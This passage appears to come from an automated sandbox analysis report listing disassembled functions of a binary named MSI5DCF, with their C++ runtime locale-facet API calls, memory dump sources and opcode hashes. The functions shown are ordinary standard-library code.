                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • codecvt.LIBCPMT ref: 00AE26AF
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE26C6
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE26E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: 2a8178a594553f991c6ab42459ee94c014dacada3e795804489b601b7dc0b213
                                                                        • Instruction ID: dd06821c0050739cf28cfef7e8dc1db841925076f97b07d7dd0dfa23f5b4641e
                                                                        • Opcode Fuzzy Hash: 2a8178a594553f991c6ab42459ee94c014dacada3e795804489b601b7dc0b213
                                                                        • Instruction Fuzzy Hash: E101D235D10299DBCB04EBA4D9457BE7BB5EF80310F250609F411AB391DF74AE018B90
                                                                        Function 00AE764B Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7652
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE765C
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • codecvt.LIBCPMT ref: 00AE7696
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE76AD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE76CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: 1c2081b9f26f55816b8361fae55043ac1f8b35bdbadd3ba731e439d3140f6bbc
                                                                        • Instruction ID: cb1afb8ab316fd667b77cb3c52cf24216df42a5a8ea429eac8d5e18932706149
                                                                        • Opcode Fuzzy Hash: 1c2081b9f26f55816b8361fae55043ac1f8b35bdbadd3ba731e439d3140f6bbc
                                                                        • Instruction Fuzzy Hash: 1701DE32910A598BCF01EBB8DA45ABEB7B1AF84314F25450AF9116B391DF34AE018B90
                                                                        Function 00AE7775 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE777C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7786
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • collate.LIBCPMT ref: 00AE77C0
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE77D7
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE77F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 9a9ae4289d6ca1fabd3077653ce801951d85313ce240a4a977c2ced376f483d8
                                                                        • Instruction ID: 730fffb9a117e77f9517370d5811290db3e1ed1fd9d5352ea68db8a978755b53
                                                                        • Opcode Fuzzy Hash: 9a9ae4289d6ca1fabd3077653ce801951d85313ce240a4a977c2ced376f483d8
                                                                        • Instruction Fuzzy Hash: 4C01D235D04259DBCB05EBA5DA456BE77B1AF84310F240549F4216B3D2DF34AE02CB90
                                                                        Function 00AE789F Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE78A6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE78B0
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • messages.LIBCPMT ref: 00AE78EA
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7901
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7921
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: 64e67b25b55849632d09257f206261dfe4f97155fda1ffc5fcf5b9ab981e3a98
                                                                        • Instruction ID: 5d9c5f9337b14e13fcc7892a276e96679b2086cce3616528ed0d54581ab57f0c
                                                                        • Opcode Fuzzy Hash: 64e67b25b55849632d09257f206261dfe4f97155fda1ffc5fcf5b9ab981e3a98
                                                                        • Instruction Fuzzy Hash: DB01DE36D0025ACBCB00EBB4EA456BE77B1AF80320F250909F5116B392DF34AE01CB90
                                                                        Function 00AF38C1 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF38C8
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF38D2
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • collate.LIBCPMT ref: 00AF390C
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3923
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3943
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: cc3f301cbd9a33a89a5b7b086857d9ee36a88799c9b09ff41af6b0400d3c20e1
                                                                        • Instruction ID: 0c5ede5e5c49b7bf04d049452ec0d25232340530b53939a23d4a4728ca48a5d1
                                                                        • Opcode Fuzzy Hash: cc3f301cbd9a33a89a5b7b086857d9ee36a88799c9b09ff41af6b0400d3c20e1
                                                                        • Instruction Fuzzy Hash: 4301D23290021D9BCF00EBA4DA556BEBBB5AF80320F240109F6216B391DFB4AF018BD4
                                                                        Function 00AE780A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7811
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • ctype.LIBCPMT ref: 00AE7855
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE786C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                        • String ID:
                                                                        • API String ID: 83828444-0
                                                                        • Opcode ID: 00ad3feeabea4c662b5f32266d92a7a21c6514cd43ff15a5e9bc2df83d91b998
                                                                        • Instruction ID: 5d3ba96fb391f66ad1b333a808e124d53862cc0f8d2af6165fb8886f3143b01d
                                                                        • Opcode Fuzzy Hash: 00ad3feeabea4c662b5f32266d92a7a21c6514cd43ff15a5e9bc2df83d91b998
                                                                        • Instruction Fuzzy Hash: 2901F535D1465ACBCB04EBA4D9456BE77B1BF84310F640509F4116B3D1DF34AE01CB90
                                                                        Function 00AE7934 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE793B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7945
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • messages.LIBCPMT ref: 00AE797F
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7996
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE79B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: e48cf0e85dd2404a9cc715e743117ef4dc4cd74628400645162f227e10343513
                                                                        • Instruction ID: 436d2f6a37a085ac96fa4d34eab02dad9b38ddf64b3ff41bff087695bdabc417
                                                                        • Opcode Fuzzy Hash: e48cf0e85dd2404a9cc715e743117ef4dc4cd74628400645162f227e10343513
                                                                        • Instruction Fuzzy Hash: 8901F132D00659CBCF05EBA4DA05ABE77B2AF80310F240549F8116B3D2CF74AE01CBA1
                                                                        Function 00AF3956 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF395D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3967
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • messages.LIBCPMT ref: 00AF39A1
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF39B8
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF39D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: daee38ac60c2ed885165d9acb7a8842e32af8247ac9cc26b67087d19df8be881
                                                                        • Instruction ID: 4848f0c32ae338f476f299f1cfa52f148ff40cb8ba32d26970fe313e96739e5a
                                                                        • Opcode Fuzzy Hash: daee38ac60c2ed885165d9acb7a8842e32af8247ac9cc26b67087d19df8be881
                                                                        • Instruction Fuzzy Hash: DB01D232D0021D9BCF00EBA4DA566BE7BB5AF80320F25050AF9116B391DFB4AF01CB90
                                                                        Function 00AF3BAA Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3BB1
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3BBB
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF3BF5
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3C0C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3C2C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: a9e7b3b80001506d29ede8b20f8a27dd27743e353a4989f70199b34e19993e49
                                                                        • Instruction ID: 11e98d461a7821c4570660527d24a2ab19408ab46b6090618b06ffaf0e09eb4b
                                                                        • Opcode Fuzzy Hash: a9e7b3b80001506d29ede8b20f8a27dd27743e353a4989f70199b34e19993e49
                                                                        • Instruction Fuzzy Hash: 4501D23690021EDBCF00EBA4DA056BEB7B1AF84310F240509F6116B391CF74AE02CB90
                                                                        Function 00AF3B15 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3B1C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3B26
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF3B60
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3B77
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3B97
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: e03705cd6394c1a86123c722fc63ba91dbbb27c009baf4adeb59161f6fafe160
                                                                        • Instruction ID: 3c24aeb2abb101564c9ddbb2c590a9d22e0f333dbe8d27ecc1fb2bcd0cdbad37
                                                                        • Opcode Fuzzy Hash: e03705cd6394c1a86123c722fc63ba91dbbb27c009baf4adeb59161f6fafe160
                                                                        • Instruction Fuzzy Hash: 2701D23691061DDBCF00EBA4DA556BEB7B1AF84310F250109F5156B391CF34AE01CB90
                                                                        Function 00AE7CB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7CB9
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7CC3
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7CFD
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7D14
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7D34
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 9254e9c79a3b49ac82f684406710748a1e6dab3722e62b208c29f91ce71fc398
                                                                        • Instruction ID: 7aeb4909927d686e8fae2f5a9c34732c6eb6f92eff6b2d0ff66f1b3f0b5c85e9
                                                                        • Opcode Fuzzy Hash: 9254e9c79a3b49ac82f684406710748a1e6dab3722e62b208c29f91ce71fc398
                                                                        • Instruction Fuzzy Hash: 53019235D04659DBCB05EBA4DA456BE77B5BF84310F240549F9116B392DF34AE018B90
                                                                        Function 00AE7C1D Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7C24
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7C2E
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7C68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7C7F
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: a510b003330f75ce773fcfaee0149d753e26d984c122020ef62dd0180d369906
                                                                        • Instruction ID: 38460b95fbf017b6ad5ca14db25698b7ed2089d0ee23991b91e5f3a291d574d8
                                                                        • Opcode Fuzzy Hash: a510b003330f75ce773fcfaee0149d753e26d984c122020ef62dd0180d369906
                                                                        • Instruction Fuzzy Hash: F101D231D006598BCB11EBB5DA456BE77B5AFC0310F340549F4216B392DF34AE018B90
                                                                        Function 00AE7DDC Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7DE3
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7DED
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7E27
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7E3E
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7E5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: ecd24be0ed5f16e7c2855523b0f8bc06833b3b0a52c26042306fb8c961d9fcdb
                                                                        • Instruction ID: b3f483c8572e28ab83c1940cc9bace854c48d47b0ac5c82a6ce24d0ea8ce19db
                                                                        • Opcode Fuzzy Hash: ecd24be0ed5f16e7c2855523b0f8bc06833b3b0a52c26042306fb8c961d9fcdb
                                                                        • Instruction Fuzzy Hash: 8401D231D14659DBCB00EBA4E9456BE77B1AF84710F240549F5116B392CF34AE01CB90
                                                                        Function 00AE7D47 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7D4E
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7D58
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7D92
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7DA9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: a2a933cb9116f816f07b9c91b7d6aa33804f2c398281e06ff704108a93ec890a
                                                                        • Instruction ID: 0703dfb377236b2f3b3bc0d6c10f664af6e0155362922b984eb14638f0f9b975
                                                                        • Opcode Fuzzy Hash: a2a933cb9116f816f07b9c91b7d6aa33804f2c398281e06ff704108a93ec890a
                                                                        • Instruction Fuzzy Hash: 6801F531D10659CBCB00EBA4DA45ABE77B1AF84310F240109F511AB392DF34AE01CBD0
                                                                        Function 00AF782B Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7835
                                                                        • LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7868
                                                                        • RtlWakeAllConditionVariable.NTDLL ref: 00AF78DF
                                                                        • SetEvent.KERNEL32(?,00AD2627,00B3571C,00B1CCC0), ref: 00AF78E9
